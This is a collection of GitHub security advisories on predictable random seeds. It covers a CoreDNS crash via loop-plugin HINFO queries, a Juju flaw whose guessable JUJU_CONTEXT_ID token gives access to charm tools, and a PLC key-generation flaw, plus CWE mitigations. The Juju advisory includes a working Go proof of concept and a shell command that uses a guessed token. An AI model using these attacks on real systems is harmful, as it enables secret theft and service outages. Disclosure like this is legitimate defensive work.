precise timing |\n| Self-test failure (upstream unreachable) | 30 seconds | **HIGH** - Extended window |\n| Network degradation | Variable | Depends on retry behavior |\n\n### Attack Scenario\n\n**Primary Attack Vector: Network Degradation**\n\nWhen the upstream DNS server is unreachable (network partition, misconfiguration, outage), the loop plugin\u0027s self-test fails repeatedly. During this period:\n\n1. The loop plugin remains active for up to 30 seconds\n2. Each self-test attempt generates an HINFO query visible in CoreDNS logs\n3. An attacker with log access (shared Kubernetes cluster, centralized logging) can observe the qname\n4. The attacker sends 3 HINFO queries with the observed qname\n5. The server immediately crashes\n\n```\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 ATTACK TIMELINE \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n\u2502 T+0s CoreDNS starts, PRNG seeded with UnixNano() \u2502\n\u2502 T+0.5s Self-test HINFO query sent (visible in logs) \u2502\n\u2502 T+2s Self-test fails (upstream timeout) \u2502\n\u2502 T+3s Retry #1 - counter resets, qname unchanged \u2502\n\u2502 T+5s Retry #2 - attacker observes qname in logs \u2502\n\u2502 T+5.1s ATTACKER: Send HINFO #1 \u2192 counter = 1 \u2502\n\u2502 T+5.2s ATTACKER: Send HINFO #2 \u2192 counter = 2 \u2502\n\u2502 T+5.3s ATTACKER: Send HINFO #3 \u2192 counter = 3 \u2192 os.Exit(1) \u2502\n\u2502 T+5.3s SERVER CRASHES \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n```\n\n---\n\n## Impact Assessment\n\n### Attack Requirements\n\n| Requirement | Notes |\n|-------------|-------|\n| Network Access | Must be able to send UDP packets to CoreDNS port |\n| Log Access | Required to observe the qname (common in shared clusters) |\n| Timing | Extended window during network degradation |\n| Authentication | None required |\n\n### Real-World Impact\n\nCoreDNS is the default DNS server for Kubernetes clusters. A successful attack would:\n\n1. **Disruption**: All DNS resolution fails within the cluster\n2. **Cascading Failures**: Services unable to discover each other\n3. **Restart Loop**: If attack persists, CoreDNS enters crash-restart cycle\n4. **Data Plane Impact**: Application-level failures across the cluster\n\n## References\n\n- CoreDNS GitHub: https://github.com/coredns/coredns\n- Loop Plugin Documentation: https://coredns.io/plugins/loop/\n- Go math/rand Documentation: https://pkg.go.dev/math/rand",
"id": "GHSA-h75p-j8xm-m278",
"modified": "2026-03-06T22:08:22Z",
"published": "2026-03-06T22:08:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-h75p-j8xm-m278"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26018"
},
{
"type": "PACKAGE",
"url": "https://github.com/coredns/coredns"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "CoreDNS Loop Detection Denial of Service Vulnerability"
}
GHSA-MH98-763H-M9V4
Vulnerability from github – Published: 2024-10-03 16:49 – Updated: 2024-10-09 22:48JUJU_CONTEXT_ID is the authentication measure on the unit hook tool abstract domain socket. It looks like JUJU_CONTEXT_ID=appname/0-update-status-6073989428498739633.
This value looks fairly unpredictable, but due to the random source used, it is highly predictable.
JUJU_CONTEXT_ID has the following components:
- the application name
- the unit number
- the hook being currently run
- a uint63 decimal number
On a system the application name and unit number can be deduced by reading the structure of the filesystem. The current hook being run is not easily deduce-able, but is a limited set of possible values, so one could try them all. Finally the random number, this is generated from a non cryptographically secure random source. Specifically the random number generator built into the go standard library, using the current unix time in seconds (at startup) as the seed.
There is no rate limiting on the abstract domain socket, the only limiting factor is time (window of time the hook is run) and memory (how much memory is available to facilitate all the connections).
Impact
On a juju machine (non-kubernetes) or juju charm container (on kubernetes), an unprivileged user in the same network namespace can connect to an abstract domain socket and guess the JUJU_CONTEXT_ID value. This gives the unprivileged user access to the same information and tools as the juju charm. This information could be secrets that give broader access.
Patches
Patch: https://github.com/juju/juju/commit/ecd7e2d0e9867576b9da04871e22232f06fa0cc7 Patched in: - 3.5.4 - 3.4.6 - 3.3.7 - 3.1.10 - 2.9.51
Workarounds
No workaround. Upgrade will be required.
References
https://github.com/juju/juju/blob/a5b7876263365977bd3e583f5325facdae73fbe4/worker/uniter/runner/context/contextfactory.go#L152 https://github.com/juju/juju/blob/a5b7876263365977bd3e583f5325facdae73fbe4/worker/uniter/runner/context/contextfactory.go#L164
PoC
With a contrived example, a charm that sleeps indefinitely on its first hook, install. This charm is called sleepy.
.
|-- hooks
| `-- install
#!/bin/sh
sleep 10000
|-- manifest.yaml
bases:
- name: ubuntu
channel: 22.04/stable
architectures:
- amd64
|-- metadata.yaml
name: sleepy
summary: a sleepy charm
description: a sleepy charm that sleeps on install
`-- revision
1
With sleepy deployed into a model, we have a unit with the name sleepy/0 and an tag of unit-sleepy-0.
With access to the log file we can very quickly get the start time of the unit:
ubuntu@juju-5e40c0-0:~$ cat /var/log/juju/unit-sleepy-0.log | grep 'unit "sleepy/0" started'
2024-08-06 05:10:07 INFO juju.worker.uniter uniter.go:363 unit "sleepy/0" started
If we don't have access to the log, we could get pretty close by trying every second between when log file was created and now:
nobody@juju-5e40c0-0:/var/log/juju$ cat unit-sleepy-0.log
cat: unit-sleepy-0.log: Permission denied
nobody@juju-5e40c0-0:/var/log/juju$ stat unit-sleepy-0.log
File: unit-sleepy-0.log
Size: 1403 Blocks: 8 IO Block: 4096 regular file
Device: 10302h/66306d Inode: 25967076 Links: 1
Access: (0640/-rw-r-----) Uid: ( 104/ syslog) Gid: ( 4/ adm)
Access: 2024-08-06 05:10:48.686975042 +0000
Modify: 2024-08-06 05:10:07.159133215 +0000
Change: 2024-08-06 05:10:07.159133215 +0000
Birth: 2024-08-06 05:10:06.965129276 +0000
We can then pass that into this program:
package main
import (
"flag"
"fmt"
"math/rand"
"time"
)
func main() {
var unitName string
var unitStartLogTime string
var currentHook string
flag.StringVar(&unitName, "u", "sleepy/0", "")
flag.StringVar(&unitStartLogTime, "t", "2024-08-06 05:10:07", "time when the last 'INFO juju.worker.uniter uniter.go:363 unit %q started' log was written to /var/log/juju/unit-name-0.log")
flag.StringVar(¤tHook, "h", "install", "the current hook that is running right now")
flag.Parse()
t, err := time.Parse("2006-01-02 15:04:05", unitStartLogTime)
if err != nil {
panic(err)
}
sources := []rand.Source{
rand.NewSource(t.Unix()),
rand.NewSource(t.Unix() - 1),
rand.NewSource(t.Unix() - 2),
}
for i := 0; i < 10; i++ {
for _, source := range sources {
fmt.Printf("%s-%s-%d\n", unitName, currentHook, source.Int63())
}
}
}
This program will give us a list of JUJU_CONTEXT_IDs to try. We just need to try each one. In this case it was the first one, because we had enough information.
$ go run . -u sleepy/0 -t "2024-08-06 05:10:07" -h install
sleepy/0-install-7349430268617352851
sleepy/0-install-2171542415131519293
sleepy/0-install-6564961386023494624
sleepy/0-install-59904244413115609
sleepy/0-install-6073989428498739633
sleepy/0-install-2504995199508561544
sleepy/0-install-1526670560532335303
sleepy/0-install-2568216045630615950
sleepy/0-install-8047402353801897930
Unfortunately, this worked too well.
nobody@juju-5e40c0-0:/var/log/juju$ JUJU_AGENT_SOCKET_NETWORK=unix JUJU_AGENT_SOCKET_ADDRESS=@/var/lib/juju/agents/unit-sleepy-0/agent.socket JUJU_CONTEXT_ID=sleepy/0-install-7349430268617352851 /var/lib/juju/tools/unit-sleepy-0/is-leader
True
With a more sophisticated attack, this could discover all the units on the machine, using the update-status hook, try a few thousand attempts per second to guess the start time and the current offset in the random source, then using secret-get hook tool, get some sort of secret, such as credentials to a system.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/juju/juju"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20240826044107-ecd7e2d0e986"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-7558"
],
"database_specific": {
"cwe_ids": [
"CWE-1391",
"CWE-337",
"CWE-340"
],
"github_reviewed": true,
"github_reviewed_at": "2024-10-03T16:49:58Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "`JUJU_CONTEXT_ID` is the authentication measure on the unit hook tool abstract domain socket. It looks like `JUJU_CONTEXT_ID=appname/0-update-status-6073989428498739633`.\n\nThis value looks fairly unpredictable, but due to the random source used, it is highly predictable.\n\n`JUJU_CONTEXT_ID` has the following components:\n- the application name\n- the unit number\n- the hook being currently run\n- a uint63 decimal number\n\nOn a system the application name and unit number can be deduced by reading the structure of the filesystem.\nThe current hook being run is not easily deduce-able, but is a limited set of possible values, so one could try them all.\nFinally the random number, this is generated from a non cryptographically secure random source. Specifically the random number generator built into the go standard library, using the current unix time in seconds (at startup) as the seed.\n\nThere is no rate limiting on the abstract domain socket, the only limiting factor is time (window of time the hook is run) and memory (how much memory is available to facilitate all the connections).\n\n### Impact\nOn a juju machine (non-kubernetes) or juju charm container (on kubernetes), an unprivileged user in the same network namespace can connect to an abstract domain socket and guess the JUJU_CONTEXT_ID value. This gives the unprivileged user access to the same information and tools as the juju charm. This information could be secrets that give broader access.\n\n### Patches\nPatch: https://github.com/juju/juju/commit/ecd7e2d0e9867576b9da04871e22232f06fa0cc7\nPatched in:\n- 3.5.4\n- 3.4.6\n- 3.3.7\n- 3.1.10\n- 2.9.51\n\n### Workarounds\nNo workaround. Upgrade will be required.\n\n### References\nhttps://github.com/juju/juju/blob/a5b7876263365977bd3e583f5325facdae73fbe4/worker/uniter/runner/context/contextfactory.go#L152\nhttps://github.com/juju/juju/blob/a5b7876263365977bd3e583f5325facdae73fbe4/worker/uniter/runner/context/contextfactory.go#L164\n\n### PoC\nWith a contrived example, a charm that sleeps indefinitely on its first hook, install. This charm is called sleepy.\n\n```\n.\n|-- hooks\n| `-- install\n#!/bin/sh\nsleep 10000\n|-- manifest.yaml\nbases:\n - name: ubuntu\n channel: 22.04/stable\n architectures:\n - amd64\n|-- metadata.yaml\nname: sleepy\nsummary: a sleepy charm\ndescription: a sleepy charm that sleeps on install\n`-- revision\n1\n```\n\nWith sleepy deployed into a model, we have a unit with the name `sleepy/0` and an tag of `unit-sleepy-0`.\n\nWith access to the log file we can very quickly get the start time of the unit:\n```\nubuntu@juju-5e40c0-0:~$ cat /var/log/juju/unit-sleepy-0.log | grep \u0027unit \"sleepy/0\" started\u0027\n2024-08-06 05:10:07 INFO juju.worker.uniter uniter.go:363 unit \"sleepy/0\" started\n```\n\nIf we don\u0027t have access to the log, we could get pretty close by trying every second between when log file was created and now:\n```\nnobody@juju-5e40c0-0:/var/log/juju$ cat unit-sleepy-0.log\ncat: unit-sleepy-0.log: Permission denied\nnobody@juju-5e40c0-0:/var/log/juju$ stat unit-sleepy-0.log\n File: unit-sleepy-0.log\n Size: 1403 \tBlocks: 8 IO Block: 4096 regular file\nDevice: 10302h/66306d\tInode: 25967076 Links: 1\nAccess: (0640/-rw-r-----) Uid: ( 104/ syslog) Gid: ( 4/ adm)\nAccess: 2024-08-06 05:10:48.686975042 +0000\nModify: 2024-08-06 05:10:07.159133215 +0000\nChange: 2024-08-06 05:10:07.159133215 +0000\n Birth: 2024-08-06 05:10:06.965129276 +0000\n```\n\nWe can then pass that into this program:\n```\npackage main\n\nimport (\n\t\"flag\"\n\t\"fmt\"\n\t\"math/rand\"\n\t\"time\"\n)\n\nfunc main() {\n\tvar unitName string\n\tvar unitStartLogTime string\n\tvar currentHook string\n\tflag.StringVar(\u0026unitName, \"u\", \"sleepy/0\", \"\")\n\tflag.StringVar(\u0026unitStartLogTime, \"t\", \"2024-08-06 05:10:07\", \"time when the last \u0027INFO juju.worker.uniter uniter.go:363 unit %q started\u0027 log was written to /var/log/juju/unit-name-0.log\")\n\tflag.StringVar(\u0026currentHook, \"h\", \"install\", \"the current hook that is running right now\")\n\tflag.Parse()\n\n\tt, err := time.Parse(\"2006-01-02 15:04:05\", unitStartLogTime)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tsources := []rand.Source{\n\t\trand.NewSource(t.Unix()),\n\t\trand.NewSource(t.Unix() - 1),\n\t\trand.NewSource(t.Unix() - 2),\n\t}\n\n\tfor i := 0; i \u003c 10; i++ {\n\t\tfor _, source := range sources {\n\t\t\tfmt.Printf(\"%s-%s-%d\\n\", unitName, currentHook, source.Int63())\n\t\t}\n\t}\n}\n```\n\nThis program will give us a list of `JUJU_CONTEXT_ID`s to try. We just need to try each one. In this case it was the first one, because we had enough information.\n\n```\n$ go run . -u sleepy/0 -t \"2024-08-06 05:10:07\" -h install\nsleepy/0-install-7349430268617352851\nsleepy/0-install-2171542415131519293\nsleepy/0-install-6564961386023494624\nsleepy/0-install-59904244413115609\nsleepy/0-install-6073989428498739633\nsleepy/0-install-2504995199508561544\nsleepy/0-install-1526670560532335303\nsleepy/0-install-2568216045630615950\nsleepy/0-install-8047402353801897930\n```\n\nUnfortunately, this worked too well.\n```\nnobody@juju-5e40c0-0:/var/log/juju$ JUJU_AGENT_SOCKET_NETWORK=unix JUJU_AGENT_SOCKET_ADDRESS=@/var/lib/juju/agents/unit-sleepy-0/agent.socket JUJU_CONTEXT_ID=sleepy/0-install-7349430268617352851 /var/lib/juju/tools/unit-sleepy-0/is-leader\nTrue\n```\n\nWith a more sophisticated attack, this could discover all the units on the machine, using the update-status hook, try a few thousand attempts per second to guess the start time and the current offset in the random source, then using secret-get hook tool, get some sort of secret, such as credentials to a system.",
"id": "GHSA-mh98-763h-m9v4",
"modified": "2024-10-09T22:48:18Z",
"published": "2024-10-03T16:49:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/juju/juju/security/advisories/GHSA-mh98-763h-m9v4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7558"
},
{
"type": "WEB",
"url": "https://github.com/juju/juju/commit/ecd7e2d0e9867576b9da04871e22232f06fa0cc7"
},
{
"type": "PACKAGE",
"url": "https://github.com/juju/juju"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2024-3173"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "JUJU_CONTEXT_ID is a predictable authentication secret"
}
GHSA-MQMM-6427-XMX3
Vulnerability from github – Published: 2025-09-24 00:30 – Updated: 2025-09-24 00:30A predictable seed in pseudo-random number generator vulnerability has been discovered in firmware version 3.60 of the Click Plus PLC. The vulnerability relies on the fact that the software implements a predictable seed for its pseudo-random number generator, which compromises the security of the generated private keys.
{
"affected": [],
"aliases": [
"CVE-2025-55069"
],
"database_specific": {
"cwe_ids": [
"CWE-337"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-23T23:15:30Z",
"severity": "HIGH"
},
"details": "A predictable seed in pseudo-random number generator vulnerability has been discovered in firmware version 3.60 of the Click Plus PLC. The vulnerability relies on the fact that the software implements a predictable seed for its pseudo-random number generator, which compromises the security of the generated private keys.",
"id": "GHSA-mqmm-6427-xmx3",
"modified": "2025-09-24T00:30:41Z",
"published": "2025-09-24T00:30:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55069"
},
{
"type": "WEB",
"url": "https://www.automationdirect.com/support/software-downloads"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-266-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
Mitigation
Use non-predictable inputs for seed generation.
Mitigation MIT-2
Strategy: Libraries or Frameworks
Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible.
Mitigation MIT-50
Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block.
No CAPEC attack patterns related to this CWE.